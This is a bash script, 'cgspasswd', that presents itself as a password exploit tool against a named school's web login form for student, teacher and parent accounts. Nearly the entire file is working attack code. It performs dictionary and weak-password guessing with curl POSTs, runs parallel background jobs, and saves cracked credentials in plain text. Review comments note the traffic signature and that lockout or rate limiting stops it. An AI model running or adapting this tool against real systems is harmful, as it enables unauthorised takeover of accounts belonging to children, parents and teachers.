#!/bin/bash
#
# cgspasswd - Country Garden School password exploit tool
# Free software maintained by MagicNAT Networking.
# Version 0.6.2 (C) MagicNAT Networking
#
# What the script does: it submits id/password pairs taken from wordlists to
# a web login form (see chk_login) and appends every pair the server accepts
# to a plaintext file (see write_cracked). It runs either as a one-shot
# command (arguments are executed as a command name plus parameters) or as
# an interactive prompt.
#
# MULTI-PROCESS (MP) MODE
#   Marked by the author as still in development. The *_mp commands take a
#   directory of dict files and start one background job per file in it.
#
# DEFINITIONS
#   id       id of a student, teacher or parent
#   passwd   password of a student, teacher or parent
#   type     kind of id: tea, stu or par
#   verbose  any non-empty value; prints every id/password tried
#
# CONFIGURATION (globals set by pre_config, changed with `config`)
#   URL_PREFIX        prefix of the login URL
#   URL_EXTENTION     suffix of the login URL
#   WEEK_PASSWD_DICT  path to the weak-password ("week" in the tool's naming) dict
#   ID_DICT           path to the id dict
#   PW_DICT           path to the password dict
#   ID_MP_DICT        directory of id dicts for MP mode
#   PW_MP_DICT        directory of password dicts for MP mode
#   CRACKED_SAVE      file that accepted id/password pairs are appended to
#   CRACK_MP_PID / WEEKPW_MP_PID (PID directories for MP jobs) are commented
#   out everywhere in this version.

# pre_config: load the built-in defaults into the global settings.
pre_config() {
  URL_PREFIX="http://127.0.0.1:8080/mis/info/tea_info/"
  URL_EXTENTION="_Login.asp"
  WEEK_PASSWD_DICT="./dicts/wpw.dict"
  ID_DICT="./dicts/id.dict"
  PW_DICT="./dicts/pw.dict"
  ID_MP_DICT="./dicts/ids/"
  PW_MP_DICT="./dicts/pws/"
  #CRACK_MP_PID="./.crack_mp.pid/"
  #WEEKPW_MP_PID="./.weekpw_mp.pid/"
  CRACKED_SAVE="./cracked.txt"
}

# config: show or change one setting.
#   $1  setting name, or "reset" to reload pre_config
#   $2  new value; when empty the current value is printed as NAME=value
# After a change (or an unknown name) the configuration is re-validated with
# chk_conf, whose status becomes the return status.
config() {
  if [[ -z $1 ]]; then
    echo "config: Missing parameter"
    return 1
  fi

  case $1 in
    URL_PREFIX)
      if [[ -z $2 ]]; then echo $1=$URL_PREFIX; return 0; fi
      URL_PREFIX=$2
      ;;
    URL_EXTENTION)
      if [[ -z $2 ]]; then echo $1=$URL_EXTENTION; return 0; fi
      URL_EXTENTION=$2
      ;;
    WEEK_PASSWD_DICT)
      # NOTE(review): the value printed comes from WEEK_PW_DICT, a name that
      # is assigned nowhere in this file, while the setter below writes
      # WEEK_PASSWD_DICT.
      if [[ -z $2 ]]; then echo $1=$WEEK_PW_DICT; return 0; fi
      WEEK_PASSWD_DICT=$2
      ;;
    ID_DICT)
      if [[ -z $2 ]]; then echo $1=$ID_DICT; return 0; fi
      ID_DICT=$2
      ;;
    PW_DICT)
      if [[ -z $2 ]]; then echo $1=$PW_DICT; return 0; fi
      PW_DICT=$2
      ;;
    ID_MP_DICT)
      if [[ -z $2 ]]; then echo $1=$ID_MP_DICT; return 0; fi
      ID_MP_DICT=$2
      ;;
    PW_MP_DICT)
      if [[ -z $2 ]]; then echo $1=$PW_MP_DICT; return 0; fi
      PW_MP_DICT=$2
      ;;
    # CRACK_MP_PID)
    #   [[ -z $2 ]] && echo $1=$CRACK_MP_PID && return 0
    #   CRACK_MP_PID=$2
    #   ;;
    # WEEKPW_MP_PID)
    #   [[ -z $2 ]] && echo $1=$WEEKPW_MP_PID && return 0
    #   WEEKPW_MP_PID=$2
    #   ;;
    CRACKED_SAVE)
      if [[ -z $2 ]]; then echo $1=$CRACKED_SAVE; return 0; fi
      CRACKED_SAVE=$2
      ;;
    reset)
      echo -n "Reset config with pre_config... "
      pre_config
      echo "OK"
      ;;
  esac

  chk_conf
}

# help: print the help text for a topic ($1), or the topic list when called
# with no arguments. This function shadows the bash builtin of the same name.
# (An older, commented-out copy of the config text that also listed the two
# PID settings was part of the original and is not reproduced here.)
help() {
  if [[ -z $* ]]; then
    echo -e "\n Available topics are: config, chk_login, chk_cracked, weekpw[_mp], crack[_mp]\n mp, new\n"
    return 0
  fi

  case $1 in
    config)
      echo -e "\n CGSPASSWD CONFIGURE\n\n URL_PREFIX: The prefix of url\n URL_EXTENTION: The extention of url\n WEEK_PASSWD_DICT: The path to week id dict\n ID_DICT: The path to ID dict\n PW_DICT: The path to Password dict\n ID_MP_DICT: The path to ID dict dir when using mutilple process\n PW_MP_DICT: The path to Password dict dir when using mutilple process\n CRACKED_SAVE: The path to the file to save cracked accounts\n\n Usage: config [value]\n config reset\n"
      ;;
    chk_login)
      echo -e "\n Check a login, usage: chk_login \n id: The id of student, teacher, or parent\n passwd: The passwd of student, teacher, or parent\n type: The type of id, could be tea, stu, or par, stand for student, teacher, \n and parent\n"
      ;;
    chk_cracked)
      echo -e "\n Check for the logins that already cracked for failure\n Usage: chk_cracked [verbose]\n verbose: Set this to get into verbose mode. Showing all password or id tried\n"
      ;;
    weekpw|weekpw_mp)
      echo -e "\n weekpw[_mp]: Find week passwords with id dict and weekpasswd dict\n Usage: weekpw[_mp] [verbose]\n using '_mp' will enable Mutli-Process, see help mp for more informations.\n type: The type of id, could be tea, stu, or par, stand for student, teacher,\n and parent\n verbose: Set this to get into verbose mode. Showing all password or id tried\n"
      ;;
    crack|crack_mp)
      echo -e "\n crack[_mp]: Crack the password of an id.\n Usage: crack[_mp] [verbose]\n using '_mp' will enable Mutli-Process, see help mp for more informations.\n id: The id of student, teacher, or parent\n type: The type of id, could be tea, stu, or par, stand for student, teacher,\n and parent\n verbose: Set this to get into verbose mode. Showing all password or id tried\n"
      ;;
    mp)
      echo -e "\n MUTIL-PROCESS HELP\n \n The mutiple process function is currently in development. You can still use \n it. However it might cause some problems. \n\n To use MP mode, create a dir with you id dict or password dict in it, \n cgspasswd will start different process for each dict files in it.\n"
      ;;
    new)
      echo -e "\n new: Start a command in backgound.\n This will be helpful when you are trying to runing mutil tasks.\n Usage: new \n"
      ;;
    *)
      echo -e "\n Help topic $1 not found. $(help)\n"
      ;;
  esac
}

# chk_login: submit one id/password pair to the login form.
#   $1  id      (posted as form field t1)
#   $2  passwd  (posted as form field t2)
#   $3  type    (inserted between URL_PREFIX and URL_EXTENTION)
# Prints "true" and returns 0 when the response body contains the word
# "moved", otherwise prints "false" and returns 1. curl's stderr is dropped,
# so a connection failure is reported as "false" as well.
#
# What this looks like from the server side: every guess is one POST to
# <URL_PREFIX><type>_Login.asp sent with curl's default User-Agent, with no
# delay between requests and, under the default http:// prefix, with the
# credentials in clear text. A run therefore appears in the web log as a
# dense series of login POSTs from one client, often walking through many
# ids; per-account lockout or request rate limiting on the form stops it.
chk_login() {
  if [[ -z $3 ]]; then
    echo "chk_login: Missing parameters"
    return 1
  fi

  if [[ -n $(curl --data "t1=$1&t2=$2" $URL_PREFIX$3$URL_EXTENTION 2> /dev/null | grep moved) ]]; then
    echo "true"
    return 0
  fi

  echo "false"
  return 1
}

# chk_cracked: replay the saved logins and report the ones that no longer work.
#   $1  verbose (optional)
# Each saved line has the form "[date] CRACKED: Type T, ID I, Password P"
# (see write_cracked); the three substitutions reduce it to "T,I,P", which
# the loop then splits on whitespace and commas.
# NOTE(review): the existence test uses $CRACKED_SAVE but the file that is
# read is the literal name creaked.txt, and the failure message expands
# $psswd, which is never assigned, so the password is missing from it.
chk_cracked() {
  if [[ ! -e $CRACKED_SAVE ]]; then
    echo "chk_cracked: Cracked account file $CRACKED_SAVE not exist."
    return 1
  fi

  ACCTLIST=$(cat creaked.txt | sed -e "s/.*Type //g" -e "s/ ID //g" -e "s/ Password //g")

  for acct in $ACCTLIST; do
    typ=$(echo $acct | awk -F, '{print $1}')
    id=$(echo $acct | awk -F, '{print $2}')
    passwd=$(echo $acct | awk -F, '{print $3}')

    if [[ -n $1 ]]; then
      echo -n "Tesing login $id($typ) with $passwd... "
    fi

    if [[ $(chk_login $id $passwd $typ) == "false" ]]; then
      echo "Account $id, type $typ, is not able to login with $psswd now."
    else
      echo "OK"
    fi
  done
}

# weekpw: try every password in WEEK_PASSWD_DICT against every id in ID_DICT.
#   $1  type
#   $2  verbose (optional)
# Stops at the first accepted password for an id and moves on to the next id.
weekpw() {
  if [[ -z $1 ]]; then
    echo "weekpw: Missing parameters"
    return 1
  fi

  for id in $(cat $ID_DICT); do
    for passwd in $(cat $WEEK_PASSWD_DICT); do
      if [[ -n $2 ]]; then
        echo "Trying login $id($1) with $passwd... "
      fi
      # Kept as an && chain so the function's return status is unchanged.
      [[ $(chk_login $id $passwd $1) == "true" ]] && write_cracked $id $passwd $1 && break
    done
  done
}

# weekpw_mp: MP variant of weekpw; one background weekpw_mp_core job per
# entry that `ls` lists in ID_MP_DICT.
#   $1  type
#   $2  verbose (optional)
weekpw_mp() {
  if [[ -z $1 ]]; then
    echo "weekpw_mp: Missing parameters"
    return 1
  fi

  for dict in $(ls $ID_MP_DICT); do
    weekpw_mp_core $ID_MP_DICT$dict $1 $2 &
  done
}

# weekpw_mp_core: internal worker for weekpw_mp, not meant to be called by
# the user.
#   $1  id dict file
#   $2  type
#   $3  verbose (optional)
weekpw_mp_core() {
  if [[ -z $2 ]]; then
    echo "weekpw_mp_core: Missing parameters"
    return 1
  fi

  #echo $$ > $WEEKPW_MP_PID$$
  for id in $(cat $1); do
    for passwd in $(cat $WEEK_PASSWD_DICT); do
      if [[ -n $3 ]]; then
        echo "Trying login $id($2) with $passwd... "
      fi
      [[ $(chk_login $id $passwd $2) == "true" ]] && write_cracked $id $passwd $2 && break
    done
  done
  #rm $WEEKPW_MP_PID$$
}

# crack: try every password in PW_DICT against a single id.
#   $1  id
#   $2  type
#   $3  verbose (optional)
crack() {
  if [[ -z $2 ]]; then
    echo "crack: Missing parameters"
    return 1
  fi

  for passwd in $(cat $PW_DICT); do
    if [[ -n $3 ]]; then
      echo "Trying login $1($2) with $passwd... "
    fi
    [[ $(chk_login $1 $passwd $2) == "true" ]] && write_cracked $1 $passwd $2 && break
  done
}

# crack_mp: MP variant of crack; one background crack_mp_core job per entry
# that `ls` lists in PW_MP_DICT.
#   $1  id
#   $2  type
#   $3  verbose (optional)
crack_mp() {
  if [[ -z $2 ]]; then
    echo "crack_mp: Missing parameters"
    return 1
  fi

  for dict in $(ls $PW_MP_DICT); do
    crack_mp_core $PW_MP_DICT$dict $1 $2 $3 &
  done
}

# crack_mp_core: internal worker for crack_mp, not meant to be called by the
# user.
#   $1  password dict file
#   $2  id
#   $3  type
#   $4  verbose (optional)
crack_mp_core() {
  if [[ -z $3 ]]; then
    echo "crack_mp_core: Missing parameters"
    return 1
  fi

  #echo $$ > $CRACK_MP_PID$$
  for passwd in $(cat $1); do
    if [[ -n $4 ]]; then
      echo "Trying login $2($3) with $passwd... "
    fi
    [[ $(chk_login $2 $passwd $3) == "true" ]] && write_cracked $2 $passwd $3 && break
  done
  #rm $CRACK_MP_PID$$
}

# write_cracked: internal; report an accepted login on stdout and append the
# same line, password included, in plain text to CRACKED_SAVE.
#   $1  id
#   $2  passwd
#   $3  type
write_cracked() {
  if [[ -z $3 ]]; then
    echo "write_cracked: Missing parameters"
    return 1
  fi

  MSG="[$(date)] CRACKED: Type $3, ID $1, Password $2"
  echo $MSG
  echo $MSG >> $CRACKED_SAVE
  return 0
}

# interactive: prompt loop. The typed line is word-split and executed as-is
# whenever `type` can resolve its first word, so any function defined here,
# any shell builtin and any program on PATH can be started from the prompt.
# The loop has no end condition of its own.
interactive() {
  echo "cgspasswd 0.6 (Interactive mode) "
  echo "Copyright 2014 MagicNAT Networking"
  echo "This is free software with ABSOLUTELY NO WARRANTY."
  echo "For help, type help"

  while :; do
    echo -n "cgspasswd> "
    read cmd
    if [[ -n $cmd ]]; then
      exe=$(echo $cmd | awk '{print $1}')
      if type "$exe" > /dev/null 2>&1; then
        $cmd
      else
        echo "cgspasswd: command not found: $exe"
      fi
    fi
  done
}

# cgsinit: load the defaults and validate them.
cgsinit() {
  pre_config
  chk_conf
  # mpinit
}

# chk_conf: terminate the tool when a configured dict path does not exist or
# when either URL part is empty. `exit` here resolves to the function defined
# further down, not to the shell builtin. (The original also carried a
# commented-out version of the test that included the two PID settings.)
chk_conf() {
  for entry in $WEEK_PASSWD_DICT $ID_DICT $PW_DICT $ID_MP_DICT $PW_MP_DICT; do
    # Kept as an && chain so the function's return status is unchanged.
    [[ ! -e $entry || -z $URL_PREFIX || -z $URL_EXTENTION ]] && echo "Something wrong, cgspasswd will now exit." && exit 1
  done
}

# Init MP mode (disabled)
#
#function mpinit {
#  mkdir $WEEKPW_MP_PID
#  mkdir $CRACK_MP_PID
#}

# new: run a command line in the background.
#   $*  command and its arguments; an empty call does nothing
new() {
  if [[ -z $* ]]; then
    return 0
  fi

  if type "$1" > /dev/null 2>&1; then
    $* &
  else
    echo "new: command not found: $*"
  fi
}

# exit: shadows the shell builtin. Sends SIGKILL to every child of this
# shell, then to the shell itself; any argument is ignored.
exit() {
  pkill -9 -P $$ > /dev/null 2>&1
  kill -9 $$ > /dev/null 2>&1
}

# main: initialise, route INT/QUIT/TERM to the exit function above, then
# either enter the interactive prompt (no arguments) or execute the
# arguments as a command.
main() {
  cgsinit
  trap 'exit' INT QUIT TERM
  [[ -z $* ]] && interactive
  $*
}

# Call main
main $*